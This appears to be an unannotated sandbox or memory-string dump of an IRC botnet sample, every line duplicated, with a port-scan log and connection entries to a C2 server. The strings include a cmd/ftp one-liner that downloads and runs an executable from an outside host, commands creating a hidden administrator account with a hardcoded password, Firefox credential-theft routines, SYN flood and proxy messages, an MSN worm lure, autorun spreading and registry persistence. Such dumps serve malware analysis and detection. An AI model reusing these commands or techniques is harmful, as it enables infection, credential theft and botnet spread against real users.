IP: 174.138.45.250:5900, Scan thread: 1, Sub-thread: 155.
IP: 174.138.45.250:5900, Scan thread: 1, Sub-thread: 155.
IP: 174.159.42.130:5900, Scan thread: 1, Sub-thread: 156.
IP: 174.159.42.130:5900, Scan thread: 1, Sub-thread: 156.
IP: 174.52.202.219:5900, Scan thread: 1, Sub-thread: 157.
IP: 174.52.202.219:5900, Scan thread: 1, Sub-thread: 157.
IP: 174.189.167.33:5900, Scan thread: 1, Sub-thread: 158.
IP: 174.189.167.33:5900, Scan thread: 1, Sub-thread: 158.
IP: 174.84.9.193:5900, Scan thread: 1, Sub-thread: 159.
IP: 174.84.9.193:5900, Scan thread: 1, Sub-thread: 159.
IP: 174.104.179.124:5900, Scan thread: 1, Sub-thread: 160.
IP: 174.104.179.124:5900, Scan thread: 1, Sub-thread: 160.
IP: 174.81.130.151:5900, Scan thread: 1, Sub-thread: 161.
IP: 174.81.130.151:5900, Scan thread: 1, Sub-thread: 161.
IP: 174.178.29.227:5900, Scan thread: 1, Sub-thread: 162.
IP: 174.178.29.227:5900, Scan thread: 1, Sub-thread: 162.
IP: 174.89.243.205:5900, Scan thread: 1, Sub-thread: 163.
IP: 174.89.243.205:5900, Scan thread: 1, Sub-thread: 163.
IP: 174.29.23.190:5900, Scan thread: 1, Sub-thread: 164.
IP: 174.29.23.190:5900, Scan thread: 1, Sub-thread: 164.
IP: 174.86.213.87:5900, Scan thread: 1, Sub-thread: 165.
IP: 174.86.213.87:5900, Scan thread: 1, Sub-thread: 165.
IP: 174.45.46.5:5900, Scan thread: 1, Sub-thread: 166.
IP: 174.45.46.5:5900, Scan thread: 1, Sub-thread: 166.
IP: 174.209.209.24:5900, Scan thread: 1, Sub-thread: 167.
IP: 174.209.209.24:5900, Scan thread: 1, Sub-thread: 167.
IP: 174.184.49.216:5900, Scan thread: 1, Sub-thread: 168.
IP: 174.184.49.216:5900, Scan thread: 1, Sub-thread: 168.
IP: 174.133.8.100:5900, Scan thread: 1, Sub-thread: 169.
IP: 174.133.8.100:5900, Scan thread: 1, Sub-thread: 169.
IP: 174.29.24.77:5900, Scan thread: 1, Sub-thread: 170.
IP: 174.29.24.77:5900, Scan thread: 1, Sub-thread: 170.
IP: 174.50.4.154:5900, Scan thread: 1, Sub-thread: 171.
IP: 174.50.4.154:5900, Scan thread: 1, Sub-thread: 171.
IP: 174.198.126.103:5900, Scan thread: 1, Sub-thread: 172.
IP: 174.198.126.103:5900, Scan thread: 1, Sub-thread: 172.
IP: 174.248.125.54:5900, Scan thread: 1, Sub-thread: 173.
IP: 174.248.125.54:5900, Scan thread: 1, Sub-thread: 173.
IP: 174.162.181.229:5900, Scan thread: 1, Sub-thread: 174.
IP: 174.162.181.229:5900, Scan thread: 1, Sub-thread: 174.
IP: 174.84.213.71:5900, Scan thread: 1, Sub-thread: 175.
IP: 174.84.213.71:5900, Scan thread: 1, Sub-thread: 175.
IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.
IP: 174.80.191.235:5900, Scan thread: 1, Sub-thread: 176.
IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.
IP: 174.80.114.244:5900, Scan thread: 1, Sub-thread: 177.
IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.
IP: 174.34.197.191:5900, Scan thread: 1, Sub-thread: 178.
IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.
IP: 174.153.180.14:5900, Scan thread: 1, Sub-thread: 179.
IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.
IP: 174.37.154.127:5900, Scan thread: 1, Sub-thread: 180.
IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.
IP: 174.230.62.26:5900, Scan thread: 1, Sub-thread: 181.
IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.
IP: 174.12.155.154:5900, Scan thread: 1, Sub-thread: 182.
IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.
IP: 174.48.165.189:5900, Scan thread: 1, Sub-thread: 183.
IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.
IP: 174.57.21.18:5900, Scan thread: 1, Sub-thread: 184.
IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.
IP: 174.188.0.195:5900, Scan thread: 1, Sub-thread: 185.
IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.
IP: 174.185.166.204:5900, Scan thread: 1, Sub-thread: 186.
IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.
IP: 174.39.203.34:5900, Scan thread: 1, Sub-thread: 187.
IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.
IP: 174.140.176.118:5900, Scan thread: 1, Sub-thread: 188.
IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.
IP: 174.3.241.182:5900, Scan thread: 1, Sub-thread: 189.
IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.
IP: 174.22.185.205:5900, Scan thread: 1, Sub-thread: 190.
IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.
IP: 174.231.109.194:5900, Scan thread: 1, Sub-thread: 191.
IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.
IP: 174.25.13.209:5900, Scan thread: 1, Sub-thread: 192.
IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.
IP: 174.151.35.149:5900, Scan thread: 1, Sub-thread: 193.
IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.
IP: 174.85.170.219:5900, Scan thread: 1, Sub-thread: 194.
IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.
IP: 174.178.22.251:5900, Scan thread: 1, Sub-thread: 195.
IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.
IP: 174.132.137.37:5900, Scan thread: 1, Sub-thread: 196.
IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.
IP: 174.127.156.6:5900, Scan thread: 1, Sub-thread: 197.
IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.
IP: 174.168.67.146:5900, Scan thread: 1, Sub-thread: 198.
IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.
IP: 174.11.174.18:5900, Scan thread: 1, Sub-thread: 199.
IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.
IP: 174.209.151.151:5900, Scan thread: 1, Sub-thread: 200.
[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
[07-30-2014 01:51:04] [FTP]: Server started on Port: 0, File: %System%\iexplorer.exe, Request: iexplorer.exe.
exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R
exe, Re[07-30-2014 01:51:04] .9-.1::.0[.12 120|MoD.0 ].1::.9-. Server started on Port: 69, File: %System%\iexplorer.exe, R
[07-30-2014 01:51:04] Joined channel: ##!v!##
[07-30-2014 01:51:04] Joined channel: ##!v!##
[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM
[07-30-2014 01:51:03] Connected to frozynv.ODIN2-VALHALL.COM
%System%\iexplorer.exe
%System%\iexplorer.exe
csrss.exe_492:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t1SSSSh
t1SSSSh
SSSh8
SSSh8
PSShB
PSShB
msn.msg
msn.msg
msn.stop
msn.stop
login
login
firefox
firefox
join
join
USERENV.dll
USERENV.dll
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TransactNamedPipe
TransactNamedPipe
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
ntpass
ntpass
Exploit FTPD: %d, Total: %d.
Exploit FTPD: %d, Total: %d.
%s: %d,
%s: %d,
%s Exploit Statistics:
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s.%s.%s.%s
%s Scan not active.
%s Scan not active.
%s Current IP: %s.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s out.
%s already running: <%d>.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Bot installed on: %s.
Go fuck yourself %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Removed by: %s!%s@%s
Advapi.dll Failed
Advapi.dll Failed
PStore.dll Failed.
PStore.dll Failed.
%s Failed to parse command.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Could not parse external IP.
%s Trying to get external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%s Failed to start scan, no IP specified.
%d.x.x.x
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
%stempfile%d%d%d%d%d.exe
ftp://%s:%s@%s:%s/%s path: %s
ftp://%s:%s@%s:%s/%s path: %s
sftp
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Socks(4) server started on %s:%i
Starting firefox pstore
Starting firefox pstore
FIREFOX Threads
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
Process Finished: "%s", Total Running Time: %s.
File executed: %s
File executed: %s
Unable to create process: "%s"
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 5.0
Windows 2000 2195
Windows 2000 2195
PK11_CheckUserPassword
PK11_CheckUserPassword
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
softokn3.dll
softokn3.dll
sqlite3.dll
sqlite3.dll
nssutil3.dll
nssutil3.dll
plds4.dll
plds4.dll
nspr4.dll
nspr4.dll
mozcrt19.dll
mozcrt19.dll
nss3.dll
nss3.dll
plc4.dll
plc4.dll
%s %s:%s
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
\profiles.ini
Application Data\Mozilla\Firefox
Application Data\Mozilla\Firefox
signons3.txt
signons3.txt
signons2.txt
signons2.txt
signons1.txt
signons1.txt
pipe\epmapper
pipe\epmapper
\\%s\
\\%s\
Windows 5.1
Windows 5.1
Windows 5.0
Windows 5.0
Windows 2000 LAN Manager*
Windows 2000 LAN Manager*
NT LAN Manager *.*
NT LAN Manager *.*
Windows Server 2003 *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
%s Started send to IP: %s.
200 PORT command successful.
200 PORT command successful.
PORT
PORT
%s %s LIST request from: %s
%s %s LIST request from: %s
425 Passive not supported on this server
425 Passive not supported on this server
215 StnyFtpd
215 StnyFtpd
331 Password required
331 Password required
%s %s
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Ping Timeout? (%d-%d)%d/%d
Login list completed!
Login list completed!
<%i> %s!%s@%s
<%i> %s!%s@%s
Logins:
Logins:
USER TbT * 0 :%s
USER TbT * 0 :%s
NICK %s
NICK %s
{%s-%s-%s-%s-%s}
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
nigzss.txt
TskMultiChatForm.UnicodeClass
TskMultiChatForm.UnicodeClass
__oxFrame.class__
__oxFrame.class__
PASS %s
PASS %s
QUIT %s
QUIT %s
PONG %s
PONG %s
NICK
NICK
PRIVMSG
PRIVMSG
JOIN
JOIN
NOTICE %s :%s
NOTICE %s :%s
PRIVMSG %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
[%s|%s]
[%s|%s]
shlwapi.dll
shlwapi.dll
pstorec.dll
pstorec.dll
psapi.dll
psapi.dll
userenv.dll
userenv.dll
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
GetUdpTable
GetUdpTable
GetTcpTable
GetTcpTable
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
FtpPutFileA
FtpPutFileA
FtpGetFileA
FtpGetFileA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
RegEnumKeyExA
RegEnumKeyExA
advapi32.dll
advapi32.dll
user32.dll
user32.dll
kernel32.dll
kernel32.dll
%s!%s@%s
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
NICK {%s-%s-%s-%s-%s}
https:/
https:/
http:/
http:/
csrss.exe
csrss.exe
*!*@fbi.edu
*!*@fbi.edu
||FTP||
||FTP||
jayne.p0rn-lover.us
jayne.p0rn-lover.us
rundat.exe
rundat.exe
vids.p0rn-lover.us
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s\%s
%s Done @ (%iKB Sec)
%s Done @ (%iKB Sec)
No %s thread found.
No %s thread found.
%s thread stopped.
%s thread stopped.
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\Desktop.ini
\autorun.inf
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://www.whatismyip.com
http://checkip.dyndns.org
http://checkip.dyndns.org
del "%s">nul
del "%s">nul
if exist "%s" goto Repeat
if exist "%s" goto Repeat
ping 0.0.0.0>nul
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s\removeMe%i%i%i%i.bat
%s%%s
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%d day%s (%0.2d hours & %0.2d mins)
%WinDir%\csrss.exe
%WinDir%\csrss.exe
193.138.244.231
193.138.244.231
192.168.48.133
192.168.48.133
231-ua-upclick.ipsystems.com.ua
231-ua-upclick.ipsystems.com.ua
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.
csrss.exe_492_rwx_00400000_0005A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
t1SSSSh
t1SSSSh
SSSh8
SSSh8
PSShB
PSShB
msn.msg
msn.msg
msn.stop
msn.stop
login
login
firefox
firefox
join
join
USERENV.dll
USERENV.dll
VkKeyScanA
VkKeyScanA
keybd_event
keybd_event
USER32.dll
USER32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
TransactNamedPipe
TransactNamedPipe
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
ntpass
ntpass
Exploit FTPD: %d, Total: %d.
Exploit FTPD: %d, Total: %d.
%s: %d,
%s: %d,
%s Exploit Statistics:
%s Exploit Statistics:
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
cmd /c echo open jayne.p0rn-lover.us 8989 > i &echo user upload upload >> i &echo binary >> i &echo get rundat.exe >> i &echo quit >> i &ftp -n -s:i &rundat.exe&del i
%s.%s.%s.%s
%s.%s.%s.%s
%s Scan not active.
%s Scan not active.
%s Current IP: %s.
%s Current IP: %s.
%s Server started, Port: %i, File: %s.
%s Server started, Port: %i, File: %s.
%d.%d.%d.%d
%d.%d.%d.%d
%s Finished at %s:%d after %d minute(s) of scanning.
%s Finished at %s:%d after %d minute(s) of scanning.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s %s:%d, Scan thread: %d, Sub-thread: %d.
%s Failed to initialize critical section, error: <%d>
%s Failed to initialize critical section, error: <%d>
%s Portscan: %s:%d open.
%s Portscan: %s:%d open.
Failed auth by %s(%s@%s)
Failed auth by %s(%s@%s)
Whats up %s? Im ready to rock!
Whats up %s? Im ready to rock!
Spy: %s!%s@%s (PM: "%s")
Spy: %s!%s@%s (PM: "%s")
Fail by: %s!%s@%s (Pass Tried: %s)
Fail by: %s!%s@%s (Pass Tried: %s)
%s out.
%s out.
%s already running: <%d>.
%s already running: <%d>.
Failed to start thread %s, error: <%d>.
Failed to start thread %s, error: <%d>.
[Current task] %s [System uptime] %s [Bot Uptime] %s
[Current task] %s [System uptime] %s [Bot Uptime] %s
Bot installed on: %s.
Bot installed on: %s.
Go fuck yourself %s.
Go fuck yourself %s.
MSN// Message & Zipfile sent to: %d contacts.
MSN// Message & Zipfile sent to: %d contacts.
Hey got new sex Pics from me %d. realy Sexy!
Hey got new sex Pics from me %d. realy Sexy!
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
MSN// Sent Stats - Messages: %d :: Files: %d :: Message & Files: %d.
Removed by: %s!%s@%s
Removed by: %s!%s@%s
Advapi.dll Failed
Advapi.dll Failed
PStore.dll Failed.
PStore.dll Failed.
%s Failed to parse command.
%s Failed to parse command.
%s Failed to start scan thread, error: <%d>.
%s Failed to start scan thread, error: <%d>.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s %s Port Scan started on %s:%d with a delay of %d seconds for %d minutes using %d threads.
%s No subnet class specified, try "-a" or "-b" or "-c"
%s No subnet class specified, try "-a" or "-b" or "-c"
%s Could not parse external IP.
%s Could not parse external IP.
%s Trying to get external IP.
%s Trying to get external IP.
%s Failed to start scan, no IP specified.
%s Failed to start scan, no IP specified.
%d.x.x.x
%d.x.x.x
%s Failed to start scan, port is invalid.
%s Failed to start scan, port is invalid.
%s Already scanning with %d threads. Too many specified.
%s Already scanning with %d threads. Too many specified.
Updating from %s (%s)
Updating from %s (%s)
%stempfile%d%d%d%d%d.exe
%stempfile%d%d%d%d%d.exe
ftp://%s:%s@%s:%s/%s path: %s
ftp://%s:%s@%s:%s/%s path: %s
sftp
sftp
net localgroup Administrateurs ASP.NET /add
net localgroup Administrateurs ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administradors ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administratoren ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrator ASP.NET /add
net localgroup Administrators ASP.NET /add
net localgroup Administrators ASP.NET /add
net user ASP.NET hardcore /add
net user ASP.NET hardcore /add
SYN: Failed to start thread,error: (%d).
SYN: Failed to start thread,error: (%d).
SYN: --> (%s:%s) for (%s secs).
SYN: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
FUCKING: --> (%s:%s) for (%s secs).
Downloading %s and saving it to: %s.
Downloading %s and saving it to: %s.
Failed to start socks4 daemon (%s)
Failed to start socks4 daemon (%s)
Socks(4) server started on %s:%i
Socks(4) server started on %s:%i
Starting firefox pstore
Starting firefox pstore
FIREFOX Threads
FIREFOX Threads
Process Finished: "%s", Total Running Time: %s.
Process Finished: "%s", Total Running Time: %s.
File executed: %s
File executed: %s
Unable to create process: "%s"
Unable to create process: "%s"
%s Couldn't parse path, error: <%d>
%s Couldn't parse path, error: <%d>
%.1fkb downloaded to %s (%.1fkbps)
%.1fkb downloaded to %s (%.1fkbps)
Couldn't open file for writing: %s.
Couldn't open file for writing: %s.
Windows for Workgroups 3.1a
Windows for Workgroups 3.1a
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
WORKGROUPlQPxf2ISQgEV1bGKWindows 2000 2195
Windows 2000 5.0
Windows 2000 5.0
Windows 2000 2195
Windows 2000 2195
PK11_CheckUserPassword
PK11_CheckUserPassword
PK11_GetInternalKeySlot
PK11_GetInternalKeySlot
softokn3.dll
softokn3.dll
sqlite3.dll
sqlite3.dll
nssutil3.dll
nssutil3.dll
plds4.dll
plds4.dll
nspr4.dll
nspr4.dll
mozcrt19.dll
mozcrt19.dll
nss3.dll
nss3.dll
plc4.dll
plc4.dll
%s %s:%s
%s %s:%s
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
SOFTWARE\Clients\StartMenuInternet\firefox.exe\shell\open\command
\profiles.ini
\profiles.ini
Application Data\Mozilla\Firefox
Application Data\Mozilla\Firefox
signons3.txt
signons3.txt
signons2.txt
signons2.txt
signons1.txt
signons1.txt
pipe\epmapper
pipe\epmapper
\\%s\
\\%s\
Windows 5.1
Windows 5.1
Windows 5.0
Windows 5.0
Windows 2000 LAN Manager*
Windows 2000 LAN Manager*
NT LAN Manager *.*
NT LAN Manager *.*
Windows Server 2003 *.*
Windows Server 2003 *.*
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s File transfer complete to IP: %s, File: %s, Size: %s bytes, Total sends: %i.
%s Started send to IP: %s.
%s Started send to IP: %s.
200 PORT command successful.
200 PORT command successful.
PORT
PORT
%s %s LIST request from: %s
%s %s LIST request from: %s
425 Passive not supported on this server
425 Passive not supported on this server
215 StnyFtpd
215 StnyFtpd
331 Password required
331 Password required
%s %s
%s %s
%s Couldn't open data connection to: %s:%i, error: <%d>.
%s Couldn't open data connection to: %s:%i, error: <%d>.
Ping Timeout? (%d-%d)%d/%d
Ping Timeout? (%d-%d)%d/%d
Login list completed!
Login list completed!
<%i> %s!%s@%s
<%i> %s!%s@%s
Logins:
Logins:
USER TbT * 0 :%s
USER TbT * 0 :%s
NICK %s
NICK %s
{%s-%s-%s-%s-%s}
{%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
{iNF-%s-%s-%s-%s-%s}
nigzss.txt
nigzss.txt
TskMultiChatForm.UnicodeClass
TskMultiChatForm.UnicodeClass
__oxFrame.class__
__oxFrame.class__
PASS %s
PASS %s
QUIT %s
QUIT %s
PONG %s
PONG %s
NICK
NICK
PRIVMSG
PRIVMSG
JOIN
JOIN
NOTICE %s :%s
NOTICE %s :%s
PRIVMSG %s :%s
PRIVMSG %s :%s
JOIN %s
JOIN %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
[%s|%s]
[%s|%s]
shlwapi.dll
shlwapi.dll
pstorec.dll
pstorec.dll
psapi.dll
psapi.dll
userenv.dll
userenv.dll
SQLDisconnect
SQLDisconnect
SQLFreeHandle
SQLFreeHandle
SQLAllocHandle
SQLAllocHandle
SQLExecDirect
SQLExecDirect
SQLSetEnvAttr
SQLSetEnvAttr
SQLDriverConnect
SQLDriverConnect
odbc32.dll
odbc32.dll
ShellExecuteA
ShellExecuteA
shell32.dll
shell32.dll
mpr.dll
mpr.dll
GetUdpTable
GetUdpTable
GetTcpTable
GetTcpTable
iphlpapi.dll
iphlpapi.dll
dnsapi.dll
dnsapi.dll
netapi32.dll
netapi32.dll
Mozilla/4.0 (compatible)
Mozilla/4.0 (compatible)
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
FtpPutFileA
FtpPutFileA
FtpGetFileA
FtpGetFileA
HttpSendRequestA
HttpSendRequestA
HttpOpenRequestA
HttpOpenRequestA
wininet.dll
wininet.dll
ws2_32.dll
ws2_32.dll
RegEnumKeyExA
RegEnumKeyExA
advapi32.dll
advapi32.dll
user32.dll
user32.dll
kernel32.dll
kernel32.dll
%s!%s@%s
%s!%s@%s
NICK {%s-%s-%s-%s-%s}
NICK {%s-%s-%s-%s-%s}
https:/
https:/
http:/
http:/
csrss.exe
csrss.exe
*!*@fbi.edu
*!*@fbi.edu
||FTP||
||FTP||
jayne.p0rn-lover.us
jayne.p0rn-lover.us
rundat.exe
rundat.exe
vids.p0rn-lover.us
vids.p0rn-lover.us
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
%s\%s
%s\%s
%s Done @ (%iKB Sec)
%s Done @ (%iKB Sec)
No %s thread found.
No %s thread found.
%s thread stopped.
%s thread stopped.
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
\Desktop.ini
\Desktop.ini
\autorun.inf
\autorun.inf
icon=%SystemRoot%\system32\SHELL32.dll,4
icon=%SystemRoot%\system32\SHELL32.dll,4
http://www.whatismyip.com
http://www.whatismyip.com
http://checkip.dyndns.org
http://checkip.dyndns.org
del "%s">nul
del "%s">nul
if exist "%s" goto Repeat
if exist "%s" goto Repeat
ping 0.0.0.0>nul
ping 0.0.0.0>nul
%s\removeMe%i%i%i%i.bat
%s\removeMe%i%i%i%i.bat
%s%%s
%s%%s
%d day%s (%0.2d hours & %0.2d mins)
%d day%s (%0.2d hours & %0.2d mins)
%WinDir%\csrss.exe
%WinDir%\csrss.exe
193.138.244.231
193.138.244.231
192.168.48.133
192.168.48.133
231-ua-upclick.ipsystems.com.ua
231-ua-upclick.ipsystems.com.ua
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.
||SCAN|| Random Port Scan started on 192.168.x.x:445 with a delay of 3 seconds for 0 minutes using 50 threads.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.
||FTP|| Server started, Port: 8989, File: %WinDir%\csrss.exe.